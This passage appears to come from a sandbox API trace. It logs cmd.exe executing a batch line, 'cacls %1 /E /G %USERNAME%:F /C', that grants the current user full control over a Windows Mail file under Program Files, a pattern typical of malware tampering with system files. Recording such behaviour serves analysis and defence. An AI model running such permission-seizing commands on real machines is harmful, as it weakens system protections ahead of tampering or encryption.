lpNumberOfBytesRead=0xc6f634*=0xe2, lpOverlapped=0x0) returned 1 [0272.723] SetFilePointer (in: hFile=0xb4, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0272.723] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=32, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0272.724] _get_osfhandle (_FileHandle=3) returned 0xb4 [0272.724] GetFileType (hFile=0xb4) returned 0x1 [0272.724] _get_osfhandle (_FileHandle=3) returned 0xb4 [0272.724] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0272.724] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="CIiHmnxMn6Ps") returned 0xc [0272.725] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0272.725] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0272.725] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0272.725] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0272.725] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0272.725] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0272.725] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0272.726] _tell (_FileHandle=3) returned 32 [0272.726] _close (_FileHandle=3) returned 0 [0272.727] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xc6f3f8 | out: _Buffer="\r\n") returned 2 [0272.727] _get_osfhandle (_FileHandle=1) returned 0x3c [0272.727] GetFileType (hFile=0x3c) returned 0x2 [0272.727] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0272.727] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f3d0 | out: lpMode=0xc6f3d0) returned 1 [0272.727] _get_osfhandle (_FileHandle=1) returned 0x3c [0272.727] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f3e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f3e8*=0x2) returned 1 [0272.727] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0272.727] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0272.728] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xc6f3f4 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0272.728] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xc6f3f4 | out: _Buffer=">") returned 1 [0272.728] _get_osfhandle (_FileHandle=1) returned 0x3c [0272.728] GetFileType (hFile=0x3c) returned 0x2 [0272.728] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0272.728] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f3d4 | out: lpMode=0xc6f3d4) returned 1 [0272.728] _get_osfhandle (_FileHandle=1) returned 0x3c [0272.728] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xc6f3ec, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xc6f3ec*=0x1e) returned 1 [0272.728] _get_osfhandle (_FileHandle=1) returned 0x3c [0272.728] GetFileType (hFile=0x3c) returned 0x2 [0272.728] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0272.728] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f674 | out: lpMode=0xc6f674) returned 1 [0272.729] _get_osfhandle (_FileHandle=1) returned 0x3c [0272.729] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xcb77b0*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xc6f68c, lpReserved=0x0 | out: lpBuffer=0xcb77b0*, lpNumberOfCharsWritten=0xc6f68c*=0x5) returned 1 [0272.729] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xc6f694 | out: _Buffer=" \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\" /E /G CIiHmnxMn6Ps:F /C ") returned 79 [0272.729] _get_osfhandle (_FileHandle=1) returned 0x3c [0272.729] GetFileType (hFile=0x3c) returned 0x2 [0272.729] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0272.729] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f66c | out: lpMode=0xc6f66c) returned 1 [0272.729] _get_osfhandle (_FileHandle=1) returned 0x3c [0272.729] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0xc6f684, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f684*=0x4f) returned 1 [0272.729] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xc6f6a8 | out: _Buffer="\r\n") returned 2 [0272.729] _get_osfhandle (_FileHandle=1) returned 0x3c [0272.729] GetFileType (hFile=0x3c) returned 0x2 [0272.729] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0272.730] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc6f680 | out: lpMode=0xc6f680) returned 1 [0272.730] _get_osfhandle (_FileHandle=1) returned 0x3c [0272.730] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xc6f698, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xc6f698*=0x2) returned 1 [0272.730] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0272.730] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0272.730] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0272.730] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0272.730] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0272.730] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0272.730] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0272.730] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0272.730] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0272.730] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0272.730] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0272.730] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0272.730] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0272.730] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0272.730] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0272.730] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0272.731] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0272.731] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0272.731] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0272.731] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0272.731] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0272.731] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0272.731] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0272.731] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0272.731] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0272.731] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0272.731] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0272.731] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0272.731] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0272.731] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0272.731] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0272.731] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0272.731] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0272.731] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0272.731] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0272.731] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0272.731] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0272.731] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0272.731] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0272.731] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0272.731] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0272.731] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0272.731] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0272.731] SetErrorMode (uMode=0x0) returned 0x0 [0272.731] SetErrorMode (uMode=0x1) returned 0x0 [0272.731] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xcbbe88, lpFilePart=0xc6f444 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xc6f444*="Desktop") returned 0x1d [0272.731] SetErrorMode (uMode=0x0) returned 0x1 [0272.731] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0272.731] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0272.733] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0272.733] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0272.733] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc6f1d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6f1d0) returned 0xffffffff [0272.733] GetLastError () returned 0x2 [0272.733] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0272.733] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc6f1d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6f1d0) returned 0xffffffff [0272.733] GetLastError () returned 0x2 [0272.733] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0272.733] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc6f1d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6f1d0) returned 0xcbc220 [0272.734] FindClose (in: hFindFile=0xcbc220 | out: hFindFile=0xcbc220) returned 1 [0272.734] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc6f1d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6f1d0) returned 0xffffffff [0272.734] GetLastError () returned 0x2 [0272.734] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc6f1d0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6f1d0) returned 0xcbc220 [0272.734] FindClose (in: hFindFile=0xcbc220 | out: hFindFile=0xcbc220) returned 1 [0272.734] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0272.734] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0272.734] GetConsoleTitleW (in: lpConsoleTitle=0xc6f218, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0272.787] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0272.787] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0272.787] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0272.787] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0272.787] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0272.787] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0272.788] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0272.788] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0272.788] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0272.788] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0272.788] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0272.788] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0272.788] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0272.788] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0272.788] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0272.788] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0272.788] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0272.788] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0272.788] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0272.788] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0272.788] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0272.788] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0272.788] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0272.788] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0272.788] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0272.788] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0272.788] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0272.788] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0272.788] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0272.788] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0272.788] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0272.788] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0272.788] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0272.788] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0272.788] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0272.788] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0272.788] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0272.788] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0272.788] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0272.788] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0272.788] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0272.788] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0272.788] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0272.788] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0272.788] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0272.788] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0272.788] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0272.788] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0272.788] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0272.788] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0272.788] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0272.788] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0272.788] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0272.788] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0272.788] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0272.788] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0272.789] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0272.789] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0272.789] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0272.789] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0272.789] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0272.789] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0272.789] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0272.789] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0272.789] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0272.789] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0272.789] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0272.789] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0272.789] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0272.789] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0272.789] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0272.789] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0272.789] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0272.789] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0272.789] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0272.789] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0272.789] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0272.789] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0272.789] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0272.789] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0272.789] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0272.789] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0272.789] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0272.789] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0272.789] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0272.789] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0272.789] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0272.789] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0272.789] SetErrorMode (uMode=0x0) returned 0x0 [0272.789] SetErrorMode (uMode=0x1) returned 0x0 [0272.789] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xcbc500, lpFilePart=0xc6ed24 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xc6ed24*="Desktop") returned 0x1d [0272.789] SetErrorMode (uMode=0x0) returned 0x1 [0272.790] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0272.790] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0272.790] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0272.790] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0272.790] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc6eab0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6eab0) returned 0xffffffff [0272.790] GetLastError () returned 0x2 [0272.790] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0272.790] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc6eab0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6eab0) returned 0xffffffff [0272.790] GetLastError () returned 0x2 [0272.790] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0272.790] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc6eab0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6eab0) returned 0xcbc898 [0272.790] FindClose (in: hFindFile=0xcbc898 | out: hFindFile=0xcbc898) returned 1 [0272.791] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc6eab0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6eab0) returned 0xffffffff [0272.791] GetLastError () returned 0x2 [0272.791] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc6eab0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc6eab0) returned 0xcbc898 [0272.791] FindClose (in: hFindFile=0xcbc898 | out: hFindFile=0xcbc898) returned 1 [0272.791] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0272.791] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0272.791] GetConsoleTitleW (in: lpConsoleTitle=0xc6efa4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0272.933] InitializeProcThreadAttributeList (in: lpAttributeList=0xc6eed0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc6eeb4 | out: lpAttributeList=0xc6eed0, lpSize=0xc6eeb4) returned 1 [0272.933] UpdateProcThreadAttribute (in: lpAttributeList=0xc6eed0, dwFlags=0x0, Attribute=0x60001, lpValue=0xc6eebc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc6eed0, lpPreviousValue=0x0) returned 1 [0272.934] GetStartupInfoW (in: lpStartupInfo=0xc6ef08 | out: lpStartupInfo=0xc6ef08*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0272.934] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0272.935] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0272.936] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xc6ee58*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc6eea4 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0xc6eea4*(hProcess=0xb8, hThread=0xb0, dwProcessId=0xa2c, dwThreadId=0xf0)) returned 1 [0272.944] CloseHandle (hObject=0xb0) returned 1 [0272.944] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0272.944] GetEnvironmentStringsW () returned 0xcb9df0* [0272.944] FreeEnvironmentStringsA (penv="=") returned 1 [0272.944] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0280.915] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0xc6ee3c | out: lpExitCode=0xc6ee3c*=0x0) returned 1 [0280.915] CloseHandle (hObject=0xb8) returned 1 [0280.915] _vsnwprintf (in: _Buffer=0xc6ef24, _BufferCount=0x13, _Format="%08X", _ArgList=0xc6ee44 | out: _Buffer="00000000") returned 8 [0280.915] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0280.915] GetEnvironmentStringsW () returned 0xcbe348* [0280.915] FreeEnvironmentStringsA (penv="=") returned 1 [0280.915] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 